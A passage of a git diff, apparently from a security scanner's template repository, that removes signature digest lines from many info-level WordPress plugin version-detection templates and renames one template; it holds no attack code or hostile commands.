a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200b3e0ce1e2da558a1bc2a1d8cff08aebaf02845b992e9ef4eec73c76dc69ed9f02207af2b7d6679ef6ebf177ab951b920c31ada363ebb94819ce6c192eff118789e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index b6802914c3..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206cb7993465e2cf07fb22466600f44d6862399d6ebaf12ba3f117c127aad8ed6d022077cbbd524fb769eb8dd6af279ce79557fd35e80bb0574a016ae0bcdc7fd97fe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 67e121f2d5..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009205078137fade3ce9f1be78cc3cf4c3b4c2db1ce9013631c6ecb336eaf2d8ef0221009b0f4fc130b69833fa99543d7373c943555dfc24977196879da6936090b15aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 039c6a3f5a..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207d9d87faeb69cf75f4c79ff5ad9ddb5a1178ceb663a6652908528b2ddeb990a902200cbf3facaa78af373750e9db957c1f4f17570f24123706d4b7e36298cfc141bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 92069bad9d..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220672a9ad21c7d6eb886d8f4290626727279992d3ff91592008fd0eb911d3d33f4022100f30d1ffb2351e4522de92fac3e2e3696b5ef84a4ac4b8d4f043e15d05cb3c456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 564d38c6b8..d69709b8f9 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -1,7 +1,7 @@ id: wordpress-ml-slider info: - name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Image Sliders Detection + name: Slider, Gallery, and Carousel by MetaSlider – Image Sliders, Video Sliders Detection author: ricardomaia severity: info reference: @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202e210f56dda51ef690447b8cdde476c7361797d1dc3e335a71696c54efdf7fd50220721715cf1e94449298a8d7d9ed85581b11f3c9a878de48b8ccc7d61c61188f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 76937623db..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022069f0a2243f15a2114c5ae665bbb06075bd4716de14464ba19a9d198919646d50022100d8388f56c68a9fe1ccae13bf0a550805aa3042689b523e1a7536d8e1892d2907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index cc115755c6..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204365bd0a6efd5475169892d74fedc51fab280bfc801c1fbe25ceae7f4232e2c20220337f833fbf9992da1172213ba8882b372132661e8c7b9738e2d6e8fb392d54fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 06e6f84bed..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204384be4669db081e4c4bd00c2af96bf86aad969baff5ac75d9a1e13c729c55f4022100b6f7db7b1f5a8ac4eb0310404398b9477a366276dc435c5f05c6cd9b6f7d8441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index f2e67c3bd6..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022037da9a7ce74415bce1bb4a00825b6dbeaf9d81bcf240b54274fde0094b7d14ad02207b3dc0678876b51af6d61f4bfa6eaeb15ea040852a073b9f6a32b72176112787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index c18c56dd4b..59a655c424 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220238a4f1d604ff2b65365577e0760b78d581ab34232b455bc3df924453516eca20220646eb7aba511d3bbae86d498ca741b78be431c7a13f33251a6985be0b84859c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 06c9502558..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022043f73bd029228f8d054364f05fd02d44aa9f91039a90f0c0ca68e96ebf2f4764022100c2ed156db8aaabcf48d397c0ffb312f46725dc7b31d2bcb0228dcc8318ca0558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index de276e9836..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201c9cb7cac9cc38dd1f5807e2c126137898369d9c67732d3b840c6bcd1767c5c0022100cc14dd58e4966ecf29c30706b9621e33895ccc80b60839677315d7009f922e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index f167055cc3..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100810c80b4efe5f975eca01c85e6b0f45919382ec662f1530dfcae188067dc0098022100d16094faa231021ca376338e6352edd4eae7c86fcb6992ccdd023e62ae18b117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c12803ee1e..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100beaabd94d8d204958dde3d622834f64e885cf57ba0bd7a2a98d89f24bc9acaf702200a400b40ef64a5acc465e2a38efebc1f0f56acff3ee89b3b4159d6716ee8936d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 34ab72acdc..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204b731e068cba628a84c61b9aeb8a9e4453fb7d7945f183245d9381863019a2a6022100a69e302bd704a1ebd6cd1fa02f0f86d3c5318441fc8f08a21431048b3df8bcb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 5333fc90fb..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204b0938edf001e8b14e3d825873b7e77c88bd83cbb4fa1ce95181094eca89e779022053bd6397cadb3cf8f7aefd3af591ac28d2dfc29debe325aff14c54380868714a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 8a0f93d1e2..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207e857a1993a9749cdc78c6be352f6bee58973f5a514e8c26a887c8c06ecd203a022100c8c5a74d8d904d823811570c1c80c917277f8d8b53384b55344ab67fe7b3ec0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index bc90527bf3..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ad47d6209595c2a303f3061510e5479eb8022fc0c96bec414782d15cf35ea29b022073864221a052dfc21f10996c11cb40cf2ff81a1b5d771991dab1b8b01d90b598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index bd130a018a..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d4d4018ad5564addfcfca45561566a7bee0c14025d5026b7b8ebed97bd5a5c71022100f0dbe2c54f04151aa2a54a79490780689ef04b0e81b2a721952f72d8d530378c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index ac9cfd847a..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d79449d9a9fbba871fdfb83b521dab84b18b0dd67b7deaf021fe2a428e78858202206972f9672d360b141c3a9149c5f2a572d231e2e9d2e1abbcfe7f51aa490d7b9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index b9281cb733..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205c589b873c16ad2efd251048bb3affd227597a40208b0bc5cad8cba4ef9527800220253b5106f0292ac467ca6a51750a5cbdd7a39cb866ddb59705010910f9a533a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 7b28a37c41..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200e676fe42f10f334fa8091814aca9979ea989adedfbc405d32d5f93daec685ac0220071a53c05bab04973a9562acf8d26ded3084b86b22420fa6b7158d5f34085c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index cb19c63cfc..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100da36c54c3dfc7e7d972d69797e432e6a50d4b2c231dbc7a07705f61d303c67700220695efab47859d45ded049233506799de1004a9aac6c3b5a624448f3a74209f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 0af9a589b8..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022061df32a09236bcd967ba8790edf8a898b45af4d0569e3efb641d1175a44aeef8022079cf5a709f39f74ea8fed43ea2f2fcef60797ae788525958a700dd36cea2e5ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index bcfe87199d..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009ffc56729967fd7997499a213823bc78f314fae5d683292faeb0f411ac76e55c02202e496366852bbf1f48912ec5424ed9c0318c310a9cefdc6a6dfc91b8382c6db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index dc5113e30f..97b7306b75 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022075f15f45be40dbf8b859edd87eaa1e146ecdf1084fb52c4cd1adf415befefb7c0220529354a50e9c5307fae0f6fe85b3f84dde2ce451fcf65c5bb700537355d9f295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index a6bdc7b655..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202ae7f76afb85b853bd093e395e04877a278bff654bb1c944e3816a7949bc0d80022100a39a34faeee160de233df6f887a33e4deee36b1fceeff77e820cd20c6114774c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 4c59c55335..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220734827528ae6c4d67ca685aa71fda0f74b4e4c73f3f5068423f455ce98ddfd09022100a88928df333024d7cc88c7ab7d9aac157fde1fad140e0f5ead119880b892248d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 6600e6760a..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f88cdda2a8d913e1dab45a29fcf7a5c6066ae746644e98f8f403dc109c75807f0220561749ab21d93c4bed240670c61f0596cc791e31d64d278fb63fb70a7a52ef1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 152061cb43..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201fd11d56b4431af4fd008601144814a6af153134c839e87dd8b98101e0fb62740220398be4bbe862fead249542f23bec1f7e4d6c35db068c391272ef2628db23139e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 55d646292c..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100810713b4c92c998af2b1b1a02ae662466f621beea2a5b3e1683459137a061bd5022020fec7c015053388955a68e76da82e20304409bfb6dc3420c74f9c5a5829aecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 82169c615e..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e9cb6ec3ddd009e408e8c76356f3fec83bbc5d68ab8fde94383f8e5a713071a202201f9d9a97a3b5e3818000a483f1cae85cb3d5acbf82009437217c1dce7b1f5611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 2ea0922556..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022058d8dd5f808bb713331b46c75f12d62db902db5805d7508fbf214a49843642c602205a16bef13ac6d91d5c129faaa50d84ba2f5314b7b4ac1047e07c83aa11ac6658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 5e0ff38672..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ec8b7c696ea5918fe3521da292e32e501bd3680fb7cfbed484fc2a1ffe095268022100adc9e2583973e9cf4639dccd7bac69276dcd2a5beba9a38f25c419b156b07d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index da28b778ce..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008e43bee7bc63ce27c193b98489d5cffe88fe0878ed10d6608f6344df125609b4022100dcdf48a9b5d0b496a727ce4bf32d2a4f2f16ff4344fadd723d5e9ae51fb4d1c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 32b67f40e2..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ec3769b0f2fd07f7cca6d5b31fccbf0cbda2fa6ba0f475d021d76b99ab745c64022100c6caeb990188e76ef745638a141007ba92e66c4bb6ebd6b1635eb05a7f72305b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 2b8fe3c56a..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009c96dd20974e1a1e48e508554c71402ddc3fb7cade3c984d2708f4c741fa72a1022100a99478d27eeb4e2a948a92c4e2ec83950e4772ec3c1addef9f63e4d750faa822:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 400546d892..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220273aeb0ddd6b3606d7184a881c57cf556c6a70bbd3e89ea63a9704cc97947866022100c5ab3bdc0185932ce94c1d780365f9536e87698e138a4d634038b3c26699d398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index b7ef031b8e..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a6c59486743f47d2ee57a907578214b9c2e893985e41cd680099b32807231060022048065713322d1c5a68a6dc3596dc6667862ed06e8193d64d05d0c7269f0dccd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 14d1952dfa..b6f392efba 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100977fd24c23b72e7677b3ce746522e61c46d6ea2ec08eab413117d4fc12ec55eb0221008d1a196a5433b10f4efb75ef49baf614054d70298a9fbe2eeacfd52c9e02bab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 6ae55601de..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206def5f29023d1625868640149bd1d7cf8434cd58f68cba29dc8991a4694062af02200ca60a39714ee41023e7ccf25a031d57422e218557caaddf925bf39b640a7055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 58e229ee39..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fc3de599e94e620ffe92a94db207b9c437bc9e629e010b60eccb8ed60aa1b413022021842bf764a86da2105c16f5137069257a7d73f6ef62dd004aab8ac0671e0566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index d2e7f45388..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100883e97efe3ba0870a476cae1c256a89784a94c5759dad44d4c34a560d8ca953302206c8e040b77118829f54e32faa2eab239a9af49805cda0da906b3ced91e9cc830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 15a1e5793c..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ddab1f6148ffca24888d5a613631f39563ac19694f3a4a0477e31bffd342a9bf0221009e359411d63e36444343c5d877b20b8355b55acb93b8cfa5f5ea5934c6e74b9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index ccc20a61aa..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022027546a685010f2eb5ce960f4d9a47f385ca3e9b8fd77ad2e988a9ae2448dbd8f022026a483695a095cf5322a09a009113ecfab90ec068928249eea1b9ed1e9611cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c69bd1d1ed..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022043ee412afd95fdf1a6793f8e78fbf3e32063ea56d320910f680ec69e26dd40590221009ad86e2d2c235d33cbbb9481daf55d73439ca0b6a5dd3d34fec31d92948b86dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 